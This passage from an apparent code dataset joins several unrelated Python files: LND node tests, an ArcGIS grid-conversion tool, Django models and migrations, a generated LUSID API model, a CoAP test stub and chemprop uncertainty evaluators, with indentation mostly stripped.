def test_update_channel_policy(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
update = bob.update_channel_policy(
chan_point=None,
base_fee_msat=5555,
fee_rate=0.5555,
time_lock_delta=9,
is_global=True,
)
assert isinstance(update, rpc_pb2.PolicyUpdateResponse)
class TestChannelBackup:
def test_export_verify_restore_multi(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
funding_txid, output_index = bob.list_channels()[0].channel_point.split(":")
channel_point = bob.channel_point_generator(
funding_txid=funding_txid, output_index=output_index
)
all_backup = bob.export_all_channel_backups()
assert isinstance(all_backup, rpc_pb2.ChanBackupSnapshot)
# assert the multi_chan backup
assert bob.verify_chan_backup(multi_chan_backup=all_backup.multi_chan_backup)
bob.stop()
wipe_channels_from_disk(bob)
bob.start()
assert not bob.list_channels()
assert bob.restore_chan_backup(
multi_chan_backup=all_backup.multi_chan_backup.multi_chan_backup
)
bob.daemon.wait_for_log("Inserting 1 SCB channel shells into DB")
carol.daemon.wait_for_log("Broadcasting force close transaction")
generate(bitcoind, 6)
bob.daemon.wait_for_log("Publishing sweep tx", timeout=120)
generate(bitcoind, 6)
assert bob.daemon.wait_for_log(
"a contract has been fully resolved!", timeout=120
)
def test_export_verify_restore_single(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
funding_txid, output_index = bob.list_channels()[0].channel_point.split(":")
channel_point = bob.channel_point_generator(
funding_txid=funding_txid, output_index=output_index
)
single_backup = bob.export_chan_backup(chan_point=channel_point)
assert isinstance(single_backup, rpc_pb2.ChannelBackup)
packed_backup = bob.pack_into_channelbackups(single_backup=single_backup)
# assert the single_chan_backup
assert bob.verify_chan_backup(single_chan_backups=packed_backup)
bob.stop()
wipe_channels_from_disk(bob)
bob.start()
assert not bob.list_channels()
assert bob.restore_chan_backup(chan_backups=packed_backup)
bob.daemon.wait_for_log("Inserting 1 SCB channel shells into DB")
carol.daemon.wait_for_log("Broadcasting force close transaction")
generate(bitcoind, 6)
bob.daemon.wait_for_log("Publishing sweep tx", timeout=120)
generate(bitcoind, 6)
assert bob.daemon.wait_for_log(
"a contract has been fully resolved!", timeout=120
)
class TestInvoices:
def test_all_invoice(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
_hash, preimage = random_32_byte_hash()
invoice_queue = queue.LifoQueue()
invoice = carol.add_hold_invoice(
memo="pytest hold invoice", hash=_hash, value=SEND_AMT
)
decoded_invoice = carol.decode_pay_req(pay_req=invoice.payment_request)
assert isinstance(invoice, invoices_pb2.AddHoldInvoiceResp)
# thread functions
def inv_sub_worker(_hash):
try:
for _response in carol.subscribe_single_invoice(_hash):
invoice_queue.put(_response)
except grpc._channel._Rendezvous:
pass
def pay_hold_inv_worker(payment_request):
try:
bob.pay_invoice(payment_request=payment_request)
except grpc._channel._Rendezvous:
pass
def settle_inv_worker(_preimage):
try:
carol.settle_invoice(preimage=_preimage)
except grpc._channel._Rendezvous:
pass
# setup the threads
inv_sub = threading.Thread(
target=inv_sub_worker, name="inv_sub", args=[_hash], daemon=True
)
pay_inv = threading.Thread(
target=pay_hold_inv_worker, args=[invoice.payment_request]
)
settle_inv = threading.Thread(target=settle_inv_worker, args=[preimage])
# start the threads
inv_sub.start()
# wait for subscription to start
while not inv_sub.is_alive():
time.sleep(0.1)
pay_inv.start()
time.sleep(2)
# carol.daemon.wait_for_log(regex=f'Invoice({decoded_invoice.payment_hash}): accepted,')
settle_inv.start()
while settle_inv.is_alive():
time.sleep(0.1)
inv_sub.join(timeout=1)
assert any(invoice.settled is True for invoice in get_updates(invoice_queue))
class TestLoop:
@pytest.mark.skip(reason="waiting to configure loop swapserver")
def test_loop_out_quote(self, bitcoind, alice, bob, loopd):
"""
250000 satoshis is currently middle of range of allowed loop amounts
"""
loop_amount = 250000
alice, bob = setup_nodes(bitcoind, [alice, bob])
if alice.daemon.invoice_rpc_active:
quote = loopd.loop_out_quote(amt=loop_amount)
assert quote is not None
assert isinstance(quote, loop_client_pb2.QuoteResponse)
else:
logging.info("test_loop_out() skipped as invoice RPC not detected")
@pytest.mark.skip(reason="waiting to configure loop swapserver")
def test_loop_out_terms(self, bitcoind, alice, bob, loopd):
alice, bob = setup_nodes(bitcoind, [alice, bob])
if alice.daemon.invoice_rpc_active:
terms = loopd.loop_out_terms()
assert terms is not None
assert isinstance(terms, loop_client_pb2.TermsResponse)
else:
logging.info("test_loop_out() skipped as invoice RPC not detected")
|
python
|
#!c:/Python26/ArcGIS10.0/python.exe
# -*- coding: utf-8 -*-
#COPYRIGHT 2016 igsnrr
#
#MORE INFO ...
#email:
"""The tool is designed to convert Arcgis Grid file to Series."""
# ######!/usr/bin/python
import sys,os
import numpy as np
import arcpy
from arcpy.sa import *
from arcpy import env
import shutil
import time
from toolbase import ToolBase
from series import SeriesWithLocation
"""Tool for Converting ESRI Grid Fiels to Series"""
class Grid2SeriesConverterTool(ToolBase):
def __init__(self):
ToolBase.__init__(self, "Grid2SeriesConverterTool", "The Grid2SeriesConverterTool is to convert Arcgis grd file to series flat files.")
self._version = "grid2seriestool.py 0.0.1"
def defineArgumentParser(self, parser):
parser.add_argument("source", action="store", help="root dir for source files")
parser.add_argument("mask", action="store", help="mask file for grd files")
parser.add_argument("target", action="store", help="root dir for source files")
parser.add_argument("-t","--tempDir", dest="tempDir", action="store", help="root dir for temporary files")
parser.add_argument("-i", "--include", dest="include", action="store", help="file for storing valid files list")
parser.add_argument("-e", "--exclude", dest="exclude", action="store", help="file for storing excluesive files list")
""" main route for processing """
def run(self, args):
srcRoot = args.source
maskPath = args.mask
targetRoot = args.target
tempDir = args.tempDir
inclusiveFilesPath = args.include
exclusiveFilesPath = args.exclude
targetPathRoot = os.path.dirname(targetRoot)
if not os.path.exists(targetPathRoot):
os.makedirs(targetPathRoot)
self._logger.info("Starting: Batch process for converting grids to series.")
self.setupProcessEnv(tempDir)
self.batchProcess(srcRoot, maskPath, targetRoot, inclusiveFilesPath, exclusiveFilesPath)
self._logger.info("Finished: Batch process for converting grids to series.")
def batchProcess(self, srcPathRoot, maskPath, targetPath, inclusiveFileListPath=None, exclusiveFilePath=None):
# loading data and mask files
self.loadBatchFileList(srcPathRoot, inclusiveFileListPath, exclusiveFilePath)
maskRaster = self.loadMaskRaster(maskPath)
dataRasters = self.loadDataFilesAsRasterArray(srcPathRoot, maskRaster)
if len(dataRasters) < 1:
print("No Raster Series and nothing is processed.")
return
# todo what you like with raster Array
self.doCustomProcessWithRasters(dataRasters)
# convert series format from rasters
seriesArray = self.rasters2Series(dataRasters)
# todo what you like with series Array
self.doCustomProcessWithSeriesArray(seriesArray)
self.saveSeries(seriesArray, targetPath)
gridFilePath = os.path.join(self.tempDir, "indexgrd")
self.saveIndexedGrid( seriesArray,dataRasters[0], gridFilePath)
def setupProcessEnv(self, tempDir):
arcpy.env.overwriteOutput = True
# Set environment settings
self.tempDir = tempDir
if self.tempDir is None:
self.tempDir = os.path.join(os.getcwd(),"temp")
if not os.path.exists(self.tempDir):
os.makedirs(self.tempDir)
# env.workspace = tempDir
""" Do custom processing whatever you want with raster array and return result in any format."""
def doCustomProcessWithRasters(self,rasters):
self._logger.info("Do custom processing whatever you want with raster array and return result in any format.")
pass;
""" Do custom processing whatever you want with the series.py data array and return result in any format."""
def doCustomProcessWithSeriesArray(self, seriesArray):
self._logger.info("Do custom processing whatever you want with the series array and return result in any format.")
pass;
"""" Convert Raster Array into SeriesArray like a table without header, format: index, i, j, x, y, v1,v2,... """
def rasters2Series(self, dataRasters):
self._logger.info("Converting rasters into series ...")
dataNpArray = self.rasters2NumPyArray(dataRasters)
raster = dataRasters[0]
extent = raster.extent
cellWidth = raster.meanCellWidth
cellHeight = raster.meanCellHeight
noDataValue = raster.noDataValue
row = raster.height
col = raster.width
index = 0
i = 0
j = 0
seriesArray = []
for i in range(row):
y = extent.YMax - cellHeight * (i + 0.5)
for j in range(col):
if (dataNpArray[0, i, j] != noDataValue):
x = extent.XMin + cellWidth * (j + 0.5)
index += 1
series = dataNpArray[:, i, j]
seriesArray.append(SeriesWithLocation(index, i, j, x, y, series))
self._logger.info("Done: converting rasters into series ...")
return seriesArray
def rasters2NumPyArray(self, rasters):
dataArray = []
for i in range(len(rasters)):
dataArray.append(arcpy.RasterToNumPyArray(rasters[i]))
data = np.array(dataArray)
return data
"""Save series.py to text files in table format."""
def saveSeries(self, seriesArray, targetPath):
dir = os.path.dirname(targetPath)
if not os.path.exists(dir):
os.mkdir(dir)
with open(targetPath, "w") as fts:
for ii in range(len(seriesArray)):
series = seriesArray[ii].toString
fts.write(series)
"""Exclude the files in the list load from configue file for exclusive items"""
def loadBatchFileList(self, srcPathRoot, inclusiveFilesPath=None, exclusiveFilesPath=None):
self._taskList = []
if inclusiveFilesPath is None:
arcpy.env.workspace = srcPathRoot
self._taskList = arcpy.ListRasters("*", "GRID")
for rasterFile in self._taskList:
print("Loading %s" % rasterFile)
# self._logger.info(rasterFile)
else:
with open(inclusiveFilesPath) as fbo:
for line in fbo.readlines():
self._taskList.append(line.strip('\n'))
self._taskExclusiveList = []
if exclusiveFilesPath is None:
return
with open(exclusiveFilesPath) as feo:
for line in feo.readlines():
self._taskExclusiveList.append(line.strip('\n'))
"""Open and load the files in the list clipped with mask, return as Raster Array"""
def loadDataFilesAsRasterArray(self, srcPathRoot, maskRaster):
if not maskRaster is None:
# Check out the ArcGIS Spatial Analyst extension license
arcpy.CheckOutExtension("Spatial")
rasters = []
for item in self._taskList:
if item not in self._taskExclusiveList:
srcPath = os.path.join(srcPathRoot, item)
if arcpy.Exists(srcPath):
raster = arcpy.sa.Raster(srcPath)
if not maskRaster is None:
raster = arcpy.sa.ExtractByMask(raster, maskRaster)
rasters.append(raster)
else:
print("Raster %s doesn't exist! check it please." % item)
return rasters
def loadMaskRaster(self, maskPath):
if not os.path.exists(maskPath):
self._logger.error("Mask raster file is missing or incorrect! Correct it and run again.")
maskRaster = arcpy.sa.Raster(maskPath)
# self.printMask(maskArray)
return maskRaster
"""" Create grid index by the series's index, x, y. """
def saveIndexedGrid(self,seriesArray, refRaster, gridFilePath ):
self._logger.info("Saving Index Grid ...")
# gridArray = np.zeros((refRaster.height, refRaster.width), dtype=np.int64)
        gridArray = np.zeros((refRaster.height, refRaster.width), dtype=np.int64)
for ii in range(len(seriesArray)):
s = seriesArray[ii]
gridArray[s.i, s.j] = s.index
# Convert array to a geodatabase raster
gridRaster = arcpy.NumPyArrayToRaster(gridArray, refRaster.extent.lowerLeft, refRaster.meanCellWidth, refRaster.meanCellHeight, 0)
gridRaster.save(gridFilePath)
self._logger.info("Done: saving Index Grid ...")
del gridRaster
def printMask(self, maskRaster):
maskArray = arcpy.RasterToNumPyArray(maskRaster)
row, col = maskArray.shape
print("row:%d col%d" %(row, col))
workspace = os.getcwd()
txmaskfile = os.path.join(self.tempDir , "txmask.txt")
print("write mask file in text %s", txmaskfile)
with open(txmaskfile, "w") as fts:
for i in range(row):
strMask = u"{}\n".format(("%s" % maskArray[i]).strip("[]"))
fts.write(strMask)
if __name__ == "__main__":
# testing code
tool = Grid2SeriesConverterTool()
import argparse
from logger import Logger
parser = argparse.ArgumentParser(prog="python.exe grid2seriestool.py", description="Grid2SeriesConverterTool Usage Guide", prefix_chars="-+")
parser.add_argument("--version", action="version", version="%(prog)s 0.0.1")
tool.defineArgumentParser(parser)
logger = Logger("log/g2s.log")
tool.attachLogger(logger)
args = parser.parse_args()
# print(args)
tool.run(args)
else:
print("loading grid2seriestool module")
|
python
|
# Generated by Django 2.0.7 on 2018-09-03 02:40
from django.db import migrations
import django.db.models.deletion
import mptt.fields
class Migration(migrations.Migration):
dependencies = [
('zinnia-threaded-comments', '0002_migrate_comments'),
]
operations = [
migrations.AlterField(
model_name='threadedcomment',
name='parent',
field=mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='children', to='zinnia-threaded-comments.ThreadedComment', verbose_name='reply in comment'),
),
]
|
python
|
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.2321
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class QuoteSeriesId(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'provider': 'str',
'price_source': 'str',
'instrument_id': 'str',
'instrument_id_type': 'str',
'quote_type': 'str',
'field': 'str'
}
attribute_map = {
'provider': 'provider',
'price_source': 'priceSource',
'instrument_id': 'instrumentId',
'instrument_id_type': 'instrumentIdType',
'quote_type': 'quoteType',
'field': 'field'
}
required_map = {
'provider': 'required',
'price_source': 'optional',
'instrument_id': 'required',
'instrument_id_type': 'required',
'quote_type': 'required',
'field': 'required'
}
def __init__(self, provider=None, price_source=None, instrument_id=None, instrument_id_type=None, quote_type=None, field=None): # noqa: E501
"""
QuoteSeriesId - a model defined in OpenAPI
:param provider: The platform or vendor that provided the quote, e.g. 'DataScope', 'LUSID' etc. (required)
:type provider: str
:param price_source: The source or originator of the quote, e.g. a bank or financial institution.
:type price_source: str
:param instrument_id: The value of the instrument identifier that uniquely identifies the instrument that the quote is for, e.g. 'BBG00JX0P539'. (required)
:type instrument_id: str
:param instrument_id_type: The type of instrument identifier used to uniquely identify the instrument that the quote is for, e.g. 'Figi'. The available values are: LusidInstrumentId, Figi, RIC, QuotePermId, Isin, CurrencyPair (required)
:type instrument_id_type: str
:param quote_type: The type of the quote. This allows for quotes other than prices e.g. rates or spreads to be used. The available values are: Price, Spread, Rate, LogNormalVol, NormalVol, ParSpread, IsdaSpread, Upfront (required)
:type quote_type: str
        :param field: The field of the quote e.g. bid, mid, ask etc. This should be consistent across a time series of quotes. The allowed values are dependent on the specified Provider. (required)
:type field: str
""" # noqa: E501
self._provider = None
self._price_source = None
self._instrument_id = None
self._instrument_id_type = None
self._quote_type = None
self._field = None
self.discriminator = None
self.provider = provider
self.price_source = price_source
self.instrument_id = instrument_id
self.instrument_id_type = instrument_id_type
self.quote_type = quote_type
self.field = field
@property
def provider(self):
"""Gets the provider of this QuoteSeriesId. # noqa: E501
The platform or vendor that provided the quote, e.g. 'DataScope', 'LUSID' etc. # noqa: E501
:return: The provider of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._provider
@provider.setter
def provider(self, provider):
"""Sets the provider of this QuoteSeriesId.
The platform or vendor that provided the quote, e.g. 'DataScope', 'LUSID' etc. # noqa: E501
:param provider: The provider of this QuoteSeriesId. # noqa: E501
:type: str
"""
if provider is None:
raise ValueError("Invalid value for `provider`, must not be `None`") # noqa: E501
self._provider = provider
@property
def price_source(self):
"""Gets the price_source of this QuoteSeriesId. # noqa: E501
The source or originator of the quote, e.g. a bank or financial institution. # noqa: E501
:return: The price_source of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._price_source
@price_source.setter
def price_source(self, price_source):
"""Sets the price_source of this QuoteSeriesId.
The source or originator of the quote, e.g. a bank or financial institution. # noqa: E501
:param price_source: The price_source of this QuoteSeriesId. # noqa: E501
:type: str
"""
self._price_source = price_source
@property
def instrument_id(self):
"""Gets the instrument_id of this QuoteSeriesId. # noqa: E501
The value of the instrument identifier that uniquely identifies the instrument that the quote is for, e.g. 'BBG00JX0P539'. # noqa: E501
:return: The instrument_id of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._instrument_id
@instrument_id.setter
def instrument_id(self, instrument_id):
"""Sets the instrument_id of this QuoteSeriesId.
The value of the instrument identifier that uniquely identifies the instrument that the quote is for, e.g. 'BBG00JX0P539'. # noqa: E501
:param instrument_id: The instrument_id of this QuoteSeriesId. # noqa: E501
:type: str
"""
if instrument_id is None:
raise ValueError("Invalid value for `instrument_id`, must not be `None`") # noqa: E501
self._instrument_id = instrument_id
@property
def instrument_id_type(self):
"""Gets the instrument_id_type of this QuoteSeriesId. # noqa: E501
The type of instrument identifier used to uniquely identify the instrument that the quote is for, e.g. 'Figi'. The available values are: LusidInstrumentId, Figi, RIC, QuotePermId, Isin, CurrencyPair # noqa: E501
:return: The instrument_id_type of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._instrument_id_type
@instrument_id_type.setter
def instrument_id_type(self, instrument_id_type):
"""Sets the instrument_id_type of this QuoteSeriesId.
The type of instrument identifier used to uniquely identify the instrument that the quote is for, e.g. 'Figi'. The available values are: LusidInstrumentId, Figi, RIC, QuotePermId, Isin, CurrencyPair # noqa: E501
:param instrument_id_type: The instrument_id_type of this QuoteSeriesId. # noqa: E501
:type: str
"""
allowed_values = [None,"LusidInstrumentId", "Figi", "RIC", "QuotePermId", "Isin", "CurrencyPair"] # noqa: E501
if instrument_id_type not in allowed_values:
raise ValueError(
"Invalid value for `instrument_id_type` ({0}), must be one of {1}" # noqa: E501
.format(instrument_id_type, allowed_values)
)
self._instrument_id_type = instrument_id_type
@property
def quote_type(self):
"""Gets the quote_type of this QuoteSeriesId. # noqa: E501
The type of the quote. This allows for quotes other than prices e.g. rates or spreads to be used. The available values are: Price, Spread, Rate, LogNormalVol, NormalVol, ParSpread, IsdaSpread, Upfront # noqa: E501
:return: The quote_type of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._quote_type
@quote_type.setter
def quote_type(self, quote_type):
"""Sets the quote_type of this QuoteSeriesId.
The type of the quote. This allows for quotes other than prices e.g. rates or spreads to be used. The available values are: Price, Spread, Rate, LogNormalVol, NormalVol, ParSpread, IsdaSpread, Upfront # noqa: E501
:param quote_type: The quote_type of this QuoteSeriesId. # noqa: E501
:type: str
"""
allowed_values = [None,"Price", "Spread", "Rate", "LogNormalVol", "NormalVol", "ParSpread", "IsdaSpread", "Upfront"] # noqa: E501
if quote_type not in allowed_values:
raise ValueError(
"Invalid value for `quote_type` ({0}), must be one of {1}" # noqa: E501
.format(quote_type, allowed_values)
)
self._quote_type = quote_type
@property
def field(self):
"""Gets the field of this QuoteSeriesId. # noqa: E501
        The field of the quote e.g. bid, mid, ask etc. This should be consistent across a time series of quotes. The allowed values are dependent on the specified Provider. # noqa: E501
:return: The field of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._field
@field.setter
def field(self, field):
"""Sets the field of this QuoteSeriesId.
        The field of the quote e.g. bid, mid, ask etc. This should be consistent across a time series of quotes. The allowed values are dependent on the specified Provider. # noqa: E501
:param field: The field of this QuoteSeriesId. # noqa: E501
:type: str
"""
if field is None:
raise ValueError("Invalid value for `field`, must not be `None`") # noqa: E501
self._field = field
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, QuoteSeriesId):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
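# Usage sketch (values are illustrative examples taken from the docstrings above, not real data):
if __name__ == "__main__":
    example_id = QuoteSeriesId(
        provider="DataScope",
        instrument_id="BBG00JX0P539",
        instrument_id_type="Figi",
        quote_type="Price",
        field="mid",
    )
    print(example_id.to_dict())
    # Equality is attribute-based, so a round trip through to_dict() compares equal.
    print(example_id == QuoteSeriesId(**example_id.to_dict()))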
|
python
|
import unittest
from messages.message import Message
from messages.option import Option
from messages import Options
import defines
class Tests(unittest.TestCase):
# def setUp(self):
# self.server_address = ("127.0.0.1", 5683)
# self.current_mid = random.randint(1, 1000)
# self.server_mid = random.randint(1000, 2000)
# self.server = CoAPServer("127.0.0.1", 5683)
# self.server_thread = threading.Thread(target=self.server.listen, args=(1,))
# self.server_thread.start()
# self.queue = Queue()
#
# def tearDown(self):
# self.server.close()
# self.server_thread.join(timeout=25)
# self.server = None
def test_create_options(self):
m = Message()
o = Options()
o.accept = 10000
# setattr(o, 'accept', 10000)
option = Option()
option.number = defines.OptionRegistry.ACCEPT.number
option.value = 10000
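        # A natural closing assertion for this test (left commented because the Options getter
        # API is not shown in this file): the high-level accessor and the hand-built Option
        # should agree on the ACCEPT value.
        # assert o.accept == option.value == 10000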
|
python
|
from django.core.validators import MinLengthValidator
from django.db import models
class Design(models.Model):
TYPE_CHOICE_INTERIOR = 'interior'
TYPE_CHOICE_PRODUCT = 'product'
TYPE_CHOICE_3D = '3d'
TYPE_CHOICE_OTHER = 'other'
TYPE_CHOICES = (
(TYPE_CHOICE_INTERIOR, 'Interior design'),
(TYPE_CHOICE_PRODUCT, 'Product design'),
(TYPE_CHOICE_3D, '3D visualizations'),
(TYPE_CHOICE_OTHER, 'Other'),
)
type = models.CharField(
max_length=20,
choices=TYPE_CHOICES,
        default=TYPE_CHOICE_OTHER,
)
title = models.CharField(
max_length=25,
)
city = models.CharField(
max_length=15,
)
country = models.CharField(
max_length=20,
)
description = models.TextField(
validators=[
MinLengthValidator(25)
],
)
image = models.ImageField(
upload_to='designs',
null=True,
blank=True,
)
class Like(models.Model):
design = models.ForeignKey(
Design,
on_delete=models.CASCADE,
)
|
python
|
from abc import ABC, abstractmethod
from typing import List
import numpy as np
from scipy.stats import t, spearmanr
from scipy.special import erfinv
from chemprop.uncertainty.uncertainty_calibrator import UncertaintyCalibrator
from chemprop.train import evaluate_predictions
class UncertaintyEvaluator(ABC):
"""
A class for evaluating the effectiveness of uncertainty estimates with metrics.
"""
def __init__(
self,
evaluation_method: str,
calibration_method: str,
uncertainty_method: str,
dataset_type: str,
loss_function: str,
calibrator: UncertaintyCalibrator,
):
self.evaluation_method = evaluation_method
self.calibration_method = calibration_method
self.uncertainty_method = uncertainty_method
self.dataset_type = dataset_type
self.loss_function = loss_function
self.calibrator = calibrator
self.raise_argument_errors()
def raise_argument_errors(self):
"""
Raise errors for incompatibilities between dataset type and uncertainty method, or similar.
"""
if self.dataset_type == "spectra":
raise NotImplementedError(
"No uncertainty evaluators implemented for spectra dataset type."
)
if self.uncertainty_method in ['ensemble', 'dropout'] and self.dataset_type in ['classification', 'multiclass']:
raise NotImplementedError(
'Though ensemble and dropout uncertainty methods are available for classification \
multiclass dataset types, their outputs are not confidences and are not \
compatible with any implemented evaluation methods for classification.'
)
@abstractmethod
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
) -> List[float]:
"""
Evaluate the performance of uncertainty predictions against the model target values.
:param targets: The target values for prediction.
:param preds: The prediction values of a model on the test set.
:param uncertainties: The estimated uncertainty values, either calibrated or uncalibrated, of a model on the test set.
:return: A list of metric values for each model task.
"""
class MetricEvaluator(UncertaintyEvaluator):
"""
A class for evaluating confidence estimates of classification and multiclass datasets using builtin evaluation metrics.
"""
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
return evaluate_predictions(
preds=uncertainties,
targets=targets,
num_tasks=np.array(targets).shape[1],
metrics=[self.evaluation_method],
dataset_type=self.dataset_type,
)[self.evaluation_method]
class NLLRegressionEvaluator(UncertaintyEvaluator):
"""
A class for evaluating regression uncertainty values using the mean negative-log-likelihood
of the actual targets given the probability distributions estimated by the model.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "regression":
raise ValueError(
"NLL Regression Evaluator is only for regression dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
if self.calibrator is None: # uncalibrated regression uncertainties are variances
uncertainties = np.array(uncertainties)
preds = np.array(preds)
targets = np.array(targets)
nll = np.log(2 * np.pi * uncertainties) / 2 \
+ (preds - targets) ** 2 / (2 * uncertainties)
return np.mean(nll, axis=0).tolist()
else:
nll = self.calibrator.nll(
preds=preds, unc=uncertainties, targets=targets
) # shape(data, task)
return np.mean(nll, axis=0).tolist()
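# Worked check of the uncalibrated branch above (comment only): with a predicted variance of 0.25
# and an absolute error of 0.5, NLL = ln(2*pi*0.25)/2 + 0.5**2/(2*0.25) ~ 0.226 + 0.500 ~ 0.726.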
class NLLClassEvaluator(UncertaintyEvaluator):
"""
A class for evaluating classification uncertainty values using the mean negative-log-likelihood
of the actual targets given the probabilities assigned to them by the model.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "classification":
raise ValueError(
"NLL Classification Evaluator is only for classification dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets)
uncertainties = np.array(uncertainties)
likelihood = uncertainties * targets + (1 - uncertainties) * (1 - targets)
nll = -1 * np.log(likelihood)
return np.mean(nll, axis=0).tolist()
class NLLMultiEvaluator(UncertaintyEvaluator):
"""
A class for evaluating multiclass uncertainty values using the mean negative-log-likelihood
of the actual targets given the probabilities assigned to them by the model.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "multiclass":
raise ValueError(
"NLL Multiclass Evaluator is only for multiclass dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets, dtype=int) # shape(data, tasks)
uncertainties = np.array(uncertainties)
preds = np.array(preds)
        nll = np.zeros_like(targets, dtype=float)  # float dtype so the per-task NLL values are not truncated
for i in range(targets.shape[1]):
task_preds = uncertainties[:, i]
task_targets = targets[:, i] # shape(data)
bin_targets = np.zeros_like(preds[:, 0, :]) # shape(data, classes)
bin_targets[np.arange(targets.shape[0]), task_targets] = 1
task_likelihood = np.sum(bin_targets * task_preds, axis=1)
task_nll = -1 * np.log(task_likelihood)
nll[:, i] = task_nll
return np.mean(nll, axis=0).tolist()
class CalibrationAreaEvaluator(UncertaintyEvaluator):
"""
A class for evaluating regression uncertainty values based on how they deviate from perfect
calibration on an observed-probability versus expected-probability plot.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "regression":
raise NotImplementedError(
f"Miscalibration area is only implemented for regression dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets) # shape(data, tasks)
uncertainties = np.array(uncertainties)
preds = np.array(preds)
abs_error = np.abs(preds - targets) # shape(data, tasks)
fractions = np.zeros([preds.shape[1], 101]) # shape(tasks, 101)
fractions[:, 100] = 1
if self.calibrator is not None:
# using 101 bin edges, hardcoded
original_metric = self.calibrator.regression_calibrator_metric
original_scaling = self.calibrator.scaling
original_interval = self.calibrator.interval_percentile
for i in range(1, 100):
self.calibrator.regression_calibrator_metric = "interval"
self.calibrator.interval_percentile = i
self.calibrator.calibrate()
bin_scaling = self.calibrator.scaling
bin_unc = (
uncertainties
/ np.expand_dims(original_scaling, axis=0)
* np.expand_dims(bin_scaling, axis=0)
) # shape(data, tasks)
bin_fraction = np.mean(bin_unc >= abs_error, axis=0)
fractions[:, i] = bin_fraction
self.calibrator.regression_calibrator_metric = original_metric
self.calibrator.scaling = original_scaling
self.calibrator.interval_percentile = original_interval
else: # uncertainties are uncalibrated variances
std = np.sqrt(uncertainties)
for i in range(1, 100):
bin_scaling = erfinv(i / 100) * np.sqrt(2)
bin_unc = std * bin_scaling
bin_fraction = np.mean(bin_unc >= abs_error, axis=0)
fractions[:, i] = bin_fraction
# trapezoid rule
auce = np.sum(
0.01 * np.abs(fractions - np.expand_dims(np.arange(101) / 100, axis=0)),
axis=1,
)
return auce.tolist()
class ExpectedNormalizedErrorEvaluator(UncertaintyEvaluator):
"""
A class that evaluates uncertainty performance by binning together clusters of predictions
and comparing the average predicted variance of the clusters against the RMSE of the cluster.
Method discussed in https://doi.org/10.1021/acs.jcim.9b00975.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "regression":
raise ValueError(
f"Expected normalized error is only appropriate for regression dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets) # shape(data, tasks)
uncertainties = np.array(uncertainties)
preds = np.array(preds)
abs_error = np.abs(preds - targets) # shape(data, tasks)
sort_record = np.rec.fromarrays([uncertainties, abs_error], names="i, j")
sort_record.sort(axis=0)
uncertainties = sort_record["i"]
abs_error = sort_record["j"]
# get stdev scaling
if self.calibrator is not None:
original_metric = self.calibrator.regression_calibrator_metric
original_scaling = self.calibrator.scaling
# 100 bins
split_unc = np.array_split(
uncertainties, 100, axis=0
) # shape(list100, data, tasks)
split_error = np.array_split(abs_error, 100, axis=0)
mean_vars = np.zeros([preds.shape[1], 100]) # shape(tasks, 100)
rmses = np.zeros_like(mean_vars)
for i in range(100):
if self.calibrator is None: # starts as a variance
mean_vars[:, i] = np.mean(split_unc[i], axis=0)
rmses[:, i] = np.sqrt(np.mean(np.square(split_error[i]), axis=0))
elif self.calibration_method == "tscaling": # convert back to sample stdev
bin_unc = split_unc[i] / np.expand_dims(original_scaling, axis=0)
bin_var = t.var(df=self.calibrator.num_models - 1, scale=bin_unc)
mean_vars[:, i] = np.mean(bin_var, axis=0)
rmses[:, i] = np.sqrt(np.mean(np.square(split_error[i]), axis=0))
else:
self.calibrator.regression_calibrator_metric = "stdev"
self.calibrator.calibrate()
